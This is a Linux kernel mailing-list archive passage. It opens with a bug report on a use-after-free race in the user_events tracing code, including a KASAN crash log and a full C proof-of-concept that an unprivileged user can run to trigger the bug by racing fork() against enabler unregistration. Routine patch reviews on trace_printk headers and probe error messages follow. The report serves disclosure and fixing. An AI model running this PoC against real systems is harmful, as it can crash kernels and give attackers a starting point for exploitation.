The issue: user_event_put(enabler->event, locked) is called
synchronously, before kfree_rcu(enabler, rcu).  If this drops the last
reference to the user_event, delayed_destroy_user_event() is scheduled
on a workqueue, which calls destroy_user_event() → kfree(user).  The
user_event memory is freed without RCU protection.

But the enabler itself is now protected by kfree_rcu — it remains
visible to RCU readers in user_event_mm_dup() during fork().  Those
readers access enabler->event (via user_event_enabler_dup →
user_event_get(orig->event)), which now points to freed memory:

   fork()                                       unregister
   ────────                                     ──────────
   user_event_mm_dup()
     rcu_read_lock();
     list_for_each_entry_rcu(enabler, ...)
  user_event_enabler_destroy()
  list_del_rcu(enabler)
  user_event_put(enabler->event)
                                                    → last ref!
                                                    → 
schedule_work(put_work)
                                                  kfree_rcu(enabler, rcu)
       user_event_enabler_dup(enabler, ...)     [workqueue]
         enabler->event =  delayed_destroy_user_event()
           user_event_get(orig->event);  destroy_user_event()
           ↑ UAF: orig->event was freed! kfree(user_event)

[Reproduction]

The PoC runs as an unprivileged user with access to
/sys/kernel/tracing/user_events_data.  It creates two threads sharing
the same mm:

   - fork_worker:  continuously calls fork()/waitpid(), which triggers
                   user_event_mm_dup() → RCU list walk
   - unreg_worker: continuously registers (DIAG_IOCSREG) and unregisters
                   (DIAG_IOCSUNREG) an event enabler, which calls
                   user_event_enabler_destroy()

The race window is small but reproducible within a few iterations on a
multi-CPU QEMU VM.

[Crash log — kernel 7.1.0-next-20260618, CONFIG_KASAN=y, SMP]

   BUG: KASAN: slab-use-after-free in user_event_mm_dup+0x319/0x630
   Write of size 4 at addr ffff88802c786fa8 by task poc/29997

   Call Trace:
    <TASK>
    dump_stack_lvl
    print_report
    kasan_report
    kasan_check_range
    user_event_mm_dup+0x319/0x630
    copy_process+0x650f/0x8090
    kernel_clone+0x214/0x9c0
    __do_sys_clone+0xce/0x120
    do_syscall_64
    entry_SYSCALL_64_after_hwframe
    </TASK>

   Allocated by task 29998:
    kasan_save_stack
    __kasan_kmalloc
    __kmalloc_cache_noprof
    user_event_parse_cmd+0x721/0x2aa0
    user_events_ioctl+0xcc0/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   Freed by task 5014:
    kasan_save_stack
    __kasan_slab_free
    kfree+0x165/0x710
    destroy_user_event+0x375/0x4f0
    delayed_destroy_user_event+0x8d/0x110
    process_one_work
    worker_thread
    kthread

   Last potentially related work creation:
    queue_work_on
    user_event_put+0x25d/0x460
    user_events_ioctl+0x1795/0x1d00
    __x64_sys_ioctl
    do_syscall_64

   ------------[ cut here ]------------
   refcount_t: addition on 0; use-after-free.
   WARNING: lib/refcount.c:25 at refcount_warn_saturate+0xf9/0x120
   Call Trace:
    user_event_mm_dup+0x349/0x630

The refcount warning on top of the KASAN report is a strong double
confirmation: user_event_get(orig->event) is trying to increment a
refcount on memory that has already been freed and zeroed.

The PoC is attached below.  It's a single C file, compiles with:

   gcc -o poc poc.c -static -lpthread

[1] 
https://sashiko.dev/#/patchset/20260618222743.538915-1-michael.bommarito%40gmail.com
     (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO

// PoC: user_event UAF on event object via user_event_mm_dup()
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <pthread.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <stdint.h>

#define DIAG_IOC_MAGIC  '*'
#define DIAG_IOCSREG    _IOWR(DIAG_IOC_MAGIC, 0, struct user_reg*)
#define DIAG_IOCSDEL    _IOW(DIAG_IOC_MAGIC, 1, char*)
#define DIAG_IOCSUNREG  _IOW(DIAG_IOC_MAGIC, 2, struct user_unreg*)

struct user_reg {
     uint32_t size; uint8_t enable_bit; uint8_t enable_size;
     uint16_t flags; uint64_t enable_addr; uint64_t name_args;
     uint32_t write_index;
} __attribute__((__packed__));

struct user_unreg {
     uint32_t size; uint8_t disable_bit; uint8_t __reserved;
     uint16_t __reserved2; uint64_t disable_addr;
} __attribute__((__packed__));

static volatile int stop_flag = 0;
static void *enable_page = NULL;
static const char *event_name = "poc_uaf_test";

static int open_fd(void)
{
     int fd = open("/sys/kernel/tracing/user_events_data", O_WRONLY);
     if (fd < 0)
         fd = open("/sys/kernel/debug/tracing/user_events_data", O_WRONLY);
     return fd;
}

static int do_reg(int fd, void *addr)
{
     struct user_reg reg = {0};
     reg.size = sizeof(reg);
     reg.enable_bit = 0;
     reg.enable_size = 4;
     reg.flags = 0;
     reg.enable_addr = (uint64_t)(unsigned long)addr;
     reg.name_args = (uint64_t)(unsigned long)event_name;
     return ioctl(fd, DIAG_IOCSREG, &reg);
}

static int do_unreg(int fd, void *addr)
{
     struct user_unreg unreg = {0};
     unreg.size = sizeof(unreg);
     unreg.disable_bit = 0;
     unreg.disable_addr = (uint64_t)(unsigned long)addr;
     return ioctl(fd, DIAG_IOCSUNREG, &unreg);
}

static void *fork_worker(void *arg)
{
     pid_t pid; int status;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(1, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         pid = fork();
         if (pid == 0) _exit(0);
         else if (pid > 0) waitpid(pid, &status, 0);
         else usleep(100);
     }
     return NULL;
}

static void *unreg_worker(void *arg)
{
     int fd;
     cpu_set_t cpuset;
     CPU_ZERO(&cpuset); CPU_SET(2, &cpuset);
     pthread_setaffinity_np(pthread_self(), sizeof(cpuset), &cpuset);
     while (!stop_flag) {
         fd = open_fd();
         if (fd < 0) continue;
         /* Ensure an enabler exists, then unregister to destroy it */
         if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
             do_unreg(fd, enable_page);
             do_reg(fd, enable_page);
         }
         close(fd);
         fd = open_fd();
         if (fd < 0) continue;
         do_unreg(fd, enable_page);
         close(fd);
         usleep(100);
     }
     return NULL;
}

int main(int argc, char **argv)
{
     pthread_t t_fork, t_unreg;
     int fd, i, iters = 30;
     if (argc > 1) iters = atoi(argv[1]);
     printf("[+] PoC: user_event UAF in user_event_mm_dup\n");
     printf("[+] Running %d iterations (3s each)\n", iters);
     enable_page = mmap(NULL, 4096, PROT_READ|PROT_WRITE,
         MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
     if (enable_page == MAP_FAILED) { perror("mmap"); return 1; }
     memset(enable_page, 0, 4096);
     fd = open_fd();
     if (fd < 0) { perror("open /sys/kernel/tracing/user_events_data"); 
return 1; }
     if (do_reg(fd, enable_page) < 0 && errno != EADDRINUSE) {
         perror("reg"); close(fd); return 1;
     }
     close(fd);
     printf("[+] Event initialized\n");
     for (i = 0; i < iters; i++) {
         printf("[+] Iter %d/%d\n", i+1, iters);
         /* Re-create enabler */
         fd = open_fd();
         if (fd >= 0) {
             if (do_reg(fd, enable_page) < 0 && errno == EADDRINUSE) {
                 do_unreg(fd, enable_page);
                 do_reg(fd, enable_page);
             }
             close(fd);
         }
         stop_flag = 0;
         pthread_create(&t_fork, NULL, fork_worker, NULL);
         pthread_create(&t_unreg, NULL, unreg_worker, NULL);
         usleep(3000000);
         stop_flag = 1;
         pthread_join(t_unreg, NULL);
         pthread_join(t_fork, NULL);
     }
     printf("[+] Done\n");
     return 0;
}


^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Steven Rostedt @ 2026-06-22 16:51 UTC (permalink / raw)
  To: Randy Dunlap
  Cc: Peter Zijlstra, linux-kernel, linux-trace-kernel,
	Masami Hiramatsu, Mark Rutland, Mathieu Desnoyers, Andrew Morton,
	Linus Torvalds, Sebastian Andrzej Siewior, John Ogness,
	Thomas Gleixner, Julia Lawall, Yury Norov, linux-doc,
	linux-kbuild, linuxppc-dev, dri-devel, linux-stm32,
	linux-arm-kernel, linux-rdma, linux-usb, linux-ext4, linux-nfs,
	kvm, intel-gfx
In-Reply-To: <08b3c961-18bb-43d9-8d7f-8a87bcad0afa@infradead.org>

On Mon, 22 Jun 2026 09:40:45 -0700
Randy Dunlap <rdunlap@infradead.org> wrote:

> > Did you forget your C 101 class? If you use a function, you gotta
> > include the relevant header.  
> 
> Also item #1 in Documentation/process/submit-checklist.rst.

What is that? Remove all trace_printk()s before you submit?

Because that is what you should do. But now you also need to remember
to remove the include <linux/trace_printk.h> too. Or, I guess if
someone uses it a lot, they may just keep it in their files without the
trace_printk()s.

-- Steve

^ permalink raw reply

* Re: [PATCH 0/2] tracing: Move trace_printk.h out of kernel.h
From: Randy Dunlap @ 2026-06-22 16:40 UTC (permalink / raw)
  To: Peter Zijlstra, Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Julia Lawall, Yury Norov, linux-doc, linux-kbuild, linuxppc-dev,
	dri-devel, linux-stm32, linux-arm-kernel, linux-rdma, linux-usb,
	linux-ext4, linux-nfs, kvm, intel-gfx
In-Reply-To: <20260622083440.GX49951@noisy.programming.kicks-ass.net>



On 6/22/26 1:34 AM, Peter Zijlstra wrote:
> On Sun, Jun 21, 2026 at 05:34:30AM -0400, Steven Rostedt wrote:
>> There's been complaints about trace_printk() being defined in kernel.h as it
>> can increase the compilation time. As it is only used by some developers for
>> debugging purposes, it should not be in kernel.h causing lots of wasted CPU
>> cycles for those that do not ever care about it.
>>
>> Instead, add a CONFIG_TRACE_PRINTK_DEBUGGING option that developers that do
>> use it can set and not have to always remember to add #include <linux/trace_printk.h>
>> to the files they add trace_printk() while debugging. It also means that
>> those that do not have that config set will not have to worry about wasted
>> CPU cycles as it is only include in the CFLAGS when the option is set, and
>> its completely ignored otherwise.
> 
> Did you forget your C 101 class? If you use a function, you gotta
> include the relevant header.

Also item #1 in Documentation/process/submit-checklist.rst.

> You don't see userspace saying: 'Hey, you know what, perhaps we should
> add stdio.h to every other header, just in case someone wants to
> printf()' either.
> 
> I really don't understand your argument. Yes, maybe someone will forget
> and then either their editor (if they have a halfway modern setup with
> LSP enabled) or their build will complain, but so what? This is all
> trivial stuff, surely we have more pressing matters to concern outselves
> with?



-- 
~Randy


^ permalink raw reply

* Re: [PATCH v3] mm/lruvec: trace LRU add drains and drain-all requests
From: JP Kobryn @ 2026-06-22 16:38 UTC (permalink / raw)
  To: David Hildenbrand (Arm), Vlastimil Babka (SUSE), Shakeel Butt
  Cc: linux-mm, willy, usama.arif, akpm, mhocko, rostedt, mhiramat,
	mathieu.desnoyers, kasong, qi.zheng, baohua, axelrasmussen,
	yuanchu, weixugc, chrisl, shikemeng, nphamcs, baoquan.he,
	youngjun.park, linux-kernel, linux-trace-kernel
In-Reply-To: <d4b55716-97c7-4e75-8500-6a1171ad7fc6@kernel.org>

On 6/18/26 5:38 AM, David Hildenbrand (Arm) wrote:
> On 6/18/26 10:30, Vlastimil Babka (SUSE) wrote:
>> On 6/18/26 10:21, David Hildenbrand (Arm) wrote:
>>> On 6/17/26 20:18, Vlastimil Babka (SUSE) wrote:
>>>>
>>>> Yeah and I don't recall ever that a change to a mm tracepoint would ever
>>>> break someone who'd complain and we'd have to revert it.
>>> Really? :)
>>>
>>> Read the context of the link I posted once more.
>>
>> Ah, I see. I've only read the single mail from Steven that referred to the
>> old powertop breakage and didn't notice the context.
>>
>> But I don't think these worries should stop us from adding easily usable
>> tracepoints.
> 
> Steve explained a way how apparently scheduler people are handling it without
> trace events.
> 
> You can always remove/modify tracepoints, but not trace events.
> 
> Anyhow, just wanted to mention it, because so far MM didn't rally know about
> this implication.
> 

Thanks for pointing this out. I'll sent v4 using DECLARE_TRACE() to
avoid creating a new event.


^ permalink raw reply

* Re: [PATCH v2 1/2] tracing: Move non-trace_printk prototypes into trace_controls.h
From: Yury Norov @ 2026-06-22 16:02 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: Yury Norov, linux-kernel, linux-trace-kernel, Masami Hiramatsu,
	Mark Rutland, Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall
In-Reply-To: <20260622112127.5763f5ba@fedora>

On Mon, Jun 22, 2026 at 11:21:27AM -0400, Steven Rostedt wrote:
> On Mon, 22 Jun 2026 09:41:16 -0400
> Yury Norov <yury.norov@gmail.com> wrote:
> 
> > On Mon, Jun 22, 2026 at 09:07:40AM -0400, Steven Rostedt wrote:
> > > From: Steven Rostedt <rostedt@goodmis.org>
> > > 
> > > In order to remove the include to trace_printk.h from kernel.h the tracing
> > > control prototypes need to be separated into their own header file as they
> > > are used in other common header files like rcu.h. There's no point in
> > > removing trace_printk.h from kernel.h if it just gets added back to other
> > > common headers.
> > > 
> > > Prototypes are very cheap for the compiler and should not be an issue.
> > > 
> > > Signed-off-by: Steven Rostedt <rostedt@goodmis.org>  
> > 
> > Suggested-by: Yury Norov <yury.norov@gmail.com>
> 
> Thanks, I'll add you tag.

Thanks, but can you also comment on trace_dump/ftrace_dump?

^ permalink raw reply

* Re: [PATCH v2 2/2] tracing: Remove trace_printk.h from kernel.h
From: Yury Norov @ 2026-06-22 16:01 UTC (permalink / raw)
  To: Steven Rostedt
  Cc: linux-kernel, linux-trace-kernel, Masami Hiramatsu, Mark Rutland,
	Mathieu Desnoyers, Andrew Morton, Linus Torvalds,
	Sebastian Andrzej Siewior, John Ogness, Thomas Gleixner,
	Peter Zijlstra, Julia Lawall, Yury Norov
In-Reply-To: <20260622131029.816825024@kernel.org>

On Mon, Jun 22, 2026 at 09:07:41AM -0400, Steven Rostedt wrote:
> From: Steven Rostedt <rostedt@goodmis.org>
> 
> There have been complaints about trace_printk.h causing more build time
> for being in kernel.h. Move it out of kernel.h and place it in the headers
> and C files that use it.
> 
> Link: https://lore.kernel.org/all/CAHk-=wikCBeVFjVXiY4o-oepdbjAoir5+TcAgtL12c4u1TpZLQ@mail.gmail.com/

Link is nice, but can you explain in the commit message what those
complaints exactly are? There's enough opinions shared to make a nice
summary. I even think it's important enough to become a Documentation
rule.
 
> Signed-off-by: Steven Rostedt <rostedt@goodmis.org>
> ---
> Changes since v1: https://patch.msgid.link/20260621093811.168514984@kernel.org
> 
> - Just remove trace_printk.h and fix up all the places that need it.
> 
>  arch/powerpc/kvm/book3s_xics.c         | 1 +
>  drivers/gpu/drm/i915/gt/intel_gtt.h    | 1 +
>  drivers/gpu/drm/i915/i915_gem.h        | 1 +
>  drivers/hwtracing/stm/dummy_stm.c      | 4 ++++
>  drivers/infiniband/hw/hfi1/trace_dbg.h | 1 +
>  drivers/usb/early/xhci-dbc.c           | 1 +
>  fs/ext4/inline.c                       | 1 +
>  include/linux/ftrace.h                 | 2 ++
>  include/linux/kernel.h                 | 1 -
>  include/linux/sunrpc/debug.h           | 1 +
>  include/linux/trace_printk.h           | 5 +++--
>  kernel/trace/ring_buffer_benchmark.c   | 1 +
>  samples/fprobe/fprobe_example.c        | 1 +
>  samples/ftrace/ftrace-direct-too.c     | 1 -
>  samples/trace_printk/trace-printk.c    | 1 +
>  15 files changed, 19 insertions(+), 4 deletions(-)
> 
> diff --git a/arch/powerpc/kvm/book3s_xics.c b/arch/powerpc/kvm/book3s_xics.c
> index 74a44fa702b0..ef5eb596a56e 100644
> --- a/arch/powerpc/kvm/book3s_xics.c
> +++ b/arch/powerpc/kvm/book3s_xics.c
> @@ -26,6 +26,7 @@
>  #if 1
>  #define XICS_DBG(fmt...) do { } while (0)
>  #else
> +#include <linux/trace_printk.h>
>  #define XICS_DBG(fmt...) trace_printk(fmt)
>  #endif
>  
> diff --git a/drivers/gpu/drm/i915/gt/intel_gtt.h b/drivers/gpu/drm/i915/gt/intel_gtt.h
> index b54ee4f25af1..f6f223090760 100644
> --- a/drivers/gpu/drm/i915/gt/intel_gtt.h
> +++ b/drivers/gpu/drm/i915/gt/intel_gtt.h
> @@ -35,6 +35,7 @@
>  #define I915_GFP_ALLOW_FAIL (GFP_KERNEL | __GFP_RETRY_MAYFAIL | __GFP_NOWARN)
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GTT)
> +#include <linux/trace_printk.h>

So, before it was included unconditionally, now it's included. It
looks technically correct, but conceptually - I'm not sure.

I'm not a developer of this driver, but ... here we need trace_printk.h
if TRACE_GTT is enabled, in the next header TRACE_GEM needs it. To me
it sounds like the whole driver simply needs trace_printk.h.

>  #define GTT_TRACE(...) trace_printk(__VA_ARGS__)
>  #else
>  #define GTT_TRACE(...)
> diff --git a/drivers/gpu/drm/i915/i915_gem.h b/drivers/gpu/drm/i915/i915_gem.h
> index 1da8fb61c09e..f490052e8964 100644
> --- a/drivers/gpu/drm/i915/i915_gem.h
> +++ b/drivers/gpu/drm/i915/i915_gem.h
> @@ -117,6 +117,7 @@ int i915_gem_open(struct drm_i915_private *i915, struct drm_file *file);
>  
>  #if IS_ENABLED(CONFIG_DRM_I915_TRACE_GEM)
>  #include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #define GEM_TRACE(...) trace_printk(__VA_ARGS__)
>  #define GEM_TRACE_ERR(...) do {						\
>  	pr_err(__VA_ARGS__);						\
> diff --git a/drivers/hwtracing/stm/dummy_stm.c b/drivers/hwtracing/stm/dummy_stm.c
> index 38528ffdc0b3..784f9af7ccba 100644
> --- a/drivers/hwtracing/stm/dummy_stm.c
> +++ b/drivers/hwtracing/stm/dummy_stm.c
> @@ -14,6 +14,10 @@
>  #include <linux/stm.h>
>  #include <uapi/linux/stm.h>
>  
> +#ifdef DEBUG
> +#include <linux/trace_printk.h>
> +#endif
> +

Same here. The cost of adding the header in a particular C file is
unmeasurable. But playing "#undef DEBUG #ifdef DEBUG" games looks
weird.

Imagine, the developer has this DEBUG enabled, then adds another
debugging trace_pritnk() out of the DEBUG block, compiles his patch
well, then sends to the user, who has DEBUG disabled; and now we hit
the same problem as in the config-based case.

Let's put it simple: dummy_stm just needs trace_printk.h.

>  static ssize_t notrace
>  dummy_stm_packet(struct stm_data *stm_data, unsigned int master,
>  		 unsigned int channel, unsigned int packet, unsigned int flags,
> diff --git a/drivers/infiniband/hw/hfi1/trace_dbg.h b/drivers/infiniband/hw/hfi1/trace_dbg.h
> index 58304b91380f..30df5e246586 100644
> --- a/drivers/infiniband/hw/hfi1/trace_dbg.h
> +++ b/drivers/infiniband/hw/hfi1/trace_dbg.h
> @@ -103,6 +103,7 @@ __hfi1_trace_def(IOCTL);
>   */
>  
>  #ifdef HFI1_EARLY_DBG
> +#include <linux/trace_printk.h>
>  #define hfi1_dbg_early(fmt, ...) \
>  	trace_printk(fmt, ##__VA_ARGS__)
>  #else
> diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
> index 41118bba9197..955c73bd601f 100644
> --- a/drivers/usb/early/xhci-dbc.c
> +++ b/drivers/usb/early/xhci-dbc.c
> @@ -30,6 +30,7 @@ static struct xdbc_state xdbc;
>  static bool early_console_keep;
>  
>  #ifdef XDBC_TRACE
> +#include <linux/trace_printk.h>
>  #define	xdbc_trace	trace_printk
>  #else
>  static inline void xdbc_trace(const char *fmt, ...) { }
> diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
> index 8045e4ff270c..0eff4a0c6a6c 100644
> --- a/fs/ext4/inline.c
> +++ b/fs/ext4/inline.c
> @@ -934,6 +934,7 @@ static int ext4_da_convert_inline_data_to_extent(struct address_space *mapping,
>  }
>  
>  #ifdef INLINE_DIR_DEBUG
> +#include <linux/trace_printk.h>
>  void ext4_show_inline_dir(struct inode *dir, struct buffer_head *bh,
>  			  void *inline_start, int inline_size)
>  {
> diff --git a/include/linux/ftrace.h b/include/linux/ftrace.h
> index 02bc5027523a..b5336a81e619 100644
> --- a/include/linux/ftrace.h
> +++ b/include/linux/ftrace.h
> @@ -8,6 +8,8 @@
>  #define _LINUX_FTRACE_H
>  
>  #include <linux/trace_recursion.h>
> +#include <linux/trace_controls.h>
> +#include <linux/trace_printk.h>
>  #include <linux/trace_clock.h>
>  #include <linux/jump_label.h>
>  #include <linux/kallsyms.h>
> diff --git a/include/linux/kernel.h b/include/linux/kernel.h
> index e5570a16cbb1..e87a40fbd152 100644
> --- a/include/linux/kernel.h
> +++ b/include/linux/kernel.h
> @@ -31,7 +31,6 @@
>  #include <linux/build_bug.h>
>  #include <linux/sprintf.h>
>  #include <linux/static_call_types.h>
> -#include <linux/trace_printk.h>
>  #include <linux/util_macros.h>
>  #include <linux/wordpart.h>
>  
> diff --git a/include/linux/sunrpc/debug.h b/include/linux/sunrpc/debug.h
> index ab61bed2f7af..7524f5d82fba 100644
> --- a/include/linux/sunrpc/debug.h
> +++ b/include/linux/sunrpc/debug.h
> @@ -29,6 +29,7 @@ extern unsigned int		nlm_debug;
>  # define ifdebug(fac)		if (unlikely(rpc_debug & RPCDBG_##fac))
>  
>  # if IS_ENABLED(CONFIG_SUNRPC_DEBUG_TRACE)
> +#  include <linux/trace_printk.h>
>  #  define __sunrpc_printk(fmt, ...)	trace_printk(fmt, ##__VA_ARGS__)
>  # else
>  #  define __sunrpc_printk(fmt, ...)	printk(KERN_DEFAULT fmt, ##__VA_ARGS__)
> diff --git a/include/linux/trace_printk.h b/include/linux/trace_printk.h
> index a488ea9e9f85..74ce4f8995c4 100644
> --- a/include/linux/trace_printk.h
> +++ b/include/linux/trace_printk.h
> @@ -1,11 +1,12 @@
>  /* SPDX-License-Identifier: GPL-2.0 */
>  #ifndef _LINUX_TRACE_PRINTK_H
>  #define _LINUX_TRACE_PRINTK_H
> +#if !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO)
>  
> -#include <linux/compiler_attributes.h>
>  #include <linux/instruction_pointer.h>
>  #include <linux/stddef.h>
>  #include <linux/stringify.h>
> +#include <linux/stdarg.h>
>  
>  #ifdef CONFIG_TRACING
>  static inline __printf(1, 2)
> @@ -147,5 +148,5 @@ ftrace_vprintk(const char *fmt, va_list ap)
>  	return 0;
>  }
>  #endif /* CONFIG_TRACING */
> -
> +#endif /* !defined(__ASSEMBLY__) && !defined(__GENKSYMS__) && !defined(BUILD_VDSO) */
>  #endif
> diff --git a/kernel/trace/ring_buffer_benchmark.c b/kernel/trace/ring_buffer_benchmark.c
> index 593e3b59e42e..2bb25caebb75 100644
> --- a/kernel/trace/ring_buffer_benchmark.c
> +++ b/kernel/trace/ring_buffer_benchmark.c
> @@ -5,6 +5,7 @@
>   * Copyright (C) 2009 Steven Rostedt <srostedt@redhat.com>
>   */
>  #include <linux/ring_buffer.h>
> +#include <linux/trace_printk.h>
>  #include <linux/completion.h>
>  #include <linux/kthread.h>
>  #include <uapi/linux/sched/types.h>
> diff --git a/samples/fprobe/fprobe_example.c b/samples/fprobe/fprobe_example.c
> index bfe98ce826f3..de81b9b4ca7d 100644
> --- a/samples/fprobe/fprobe_example.c
> +++ b/samples/fprobe/fprobe_example.c
> @@ -12,6 +12,7 @@
>  
>  #define pr_fmt(fmt) "%s: " fmt, __func__
>  
> +#include <linux/trace_printk.h>
>  #include <linux/kernel.h>
>  #include <linux/module.h>
>  #include <linux/fprobe.h>
> diff --git a/samples/ftrace/ftrace-direct-too.c b/samples/ftrace/ftrace-direct-too.c
> index bf2411aa6fd7..159190f4103f 100644
> --- a/samples/ftrace/ftrace-direct-too.c
> +++ b/samples/ftrace/ftrace-direct-too.c
> @@ -1,6 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
>  #include <linux/module.h>
> -
>  #include <linux/mm.h> /* for handle_mm_fault() */
>  #include <linux/ftrace.h>
>  #if !defined(CONFIG_ARM64) && !defined(CONFIG_PPC32)
> diff --git a/samples/trace_printk/trace-printk.c b/samples/trace_printk/trace-printk.c
> index cfc159580263..ff37aeb8523e 100644
> --- a/samples/trace_printk/trace-printk.c
> +++ b/samples/trace_printk/trace-printk.c
> @@ -1,4 +1,5 @@
>  // SPDX-License-Identifier: GPL-2.0-only
> +#include <linux/trace_printk.h>
>  #include <linux/module.h>
>  #include <linux/kthread.h>
>  #include <linux/irq_work.h>
> -- 
> 2.53.0
> 

^ permalink raw reply

* [PATCH] tracing/probes: make file offset error message probe-agnostic
From: Yudistira Putra @ 2026-06-22 16:00 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

The shared probe argument parser rejects file offsets for kernel probes.
This path is used outside the kprobe event parser too, but the diagnostic
currently says "with kprobe" even when emitted from another probe path.

Make the diagnostic probe-agnostic.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.c | 2 +-
 kernel/trace/trace_probe.h | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index fd1caa1f9723..fec0ad51cf61 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1228,7 +1228,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			code->op = FETCH_OP_IMM;
 			code->immediate = param;
 		} else if (arg[1] == '+') {
-			/* kprobes don't support file offsets */
+			/* Kernel probes do not support file offsets */
 			if (ctx->flags & TPARG_FL_KERNEL) {
 				trace_probe_log_err(ctx->offset, FILE_ON_KPROBE);
 				return -EINVAL;
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..6162f066c2b8 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -516,7 +516,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
 	C(IMMSTR_NO_CLOSE,	"String is not closed with '\"'"),	\
-	C(FILE_ON_KPROBE,	"File offset is not available with kprobe"), \
+	C(FILE_ON_KPROBE,	"File offset is not available for kernel probes"), \
 	C(BAD_FILE_OFFS,	"Invalid file offset value"),		\
 	C(SYM_ON_UPROBE,	"Symbol is not available with uprobe"),	\
 	C(TOO_MANY_OPS,		"Dereference is too much nested"), 	\
-- 
2.43.0


^ permalink raw reply related

* [PATCH] tracing/probes: fix typo in invalid variable error message
From: Yudistira Putra @ 2026-06-22 15:23 UTC (permalink / raw)
  To: Steven Rostedt, Masami Hiramatsu
  Cc: Mathieu Desnoyers, linux-trace-kernel, linux-kernel,
	Yudistira Putra

Fix a typo in the BAD_VAR diagnostic emitted for invalid $-variables
in probe event arguments.

Signed-off-by: Yudistira Putra <pyudistira519@gmail.com>
---
 kernel/trace/trace_probe.h | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 15758cc11fc6..0f09f7aaf93f 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -511,7 +511,7 @@ extern int traceprobe_define_arg_fields(struct trace_event_call *event_call,
 	C(NO_RETVAL,		"This function returns 'void' type"),	\
 	C(BAD_STACK_NUM,	"Invalid stack number"),		\
 	C(BAD_ARG_NUM,		"Invalid argument number"),		\
-	C(BAD_VAR,		"Invalid $-valiable specified"),	\
+	C(BAD_VAR,		"Invalid $-variable specified"),	\
 	C(BAD_REG_NAME,		"Invalid register name"),		\
 	C(BAD_MEM_ADDR,		"Invalid memory address"),		\
 	C(BAD_IMM,		"Invalid immediate value"),		\
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH v2 0/2] tracing: Remove trace_printk.h from kernel.h
From: Steven Rostedt @ 2026-06-22 15:21 UTC (permalink / raw)
  To: Masami Hiramatsu (Google)
  Cc: linux-kernel, linux-trace-kernel, Mark Rutland, Mathieu Desnoyers,
	Andrew Morton, Linus Torvalds, Sebastian Andrzej Siewior,
	John Ogness, Thomas Gleixner, Peter Zijlstra, Julia Lawall,
	Yury Norov
In-Reply-To: <20260622234416.9f85ff87b81bcfb9776c73a6@kernel.org>

On Mon, 22 Jun 2026 23:44:16 +0900
Masami Hiramatsu (Google) <mhiramat@kernel.org> wrote:

> The series looks good to me.
> 
> Acked-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Thanks!

-- Steve

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox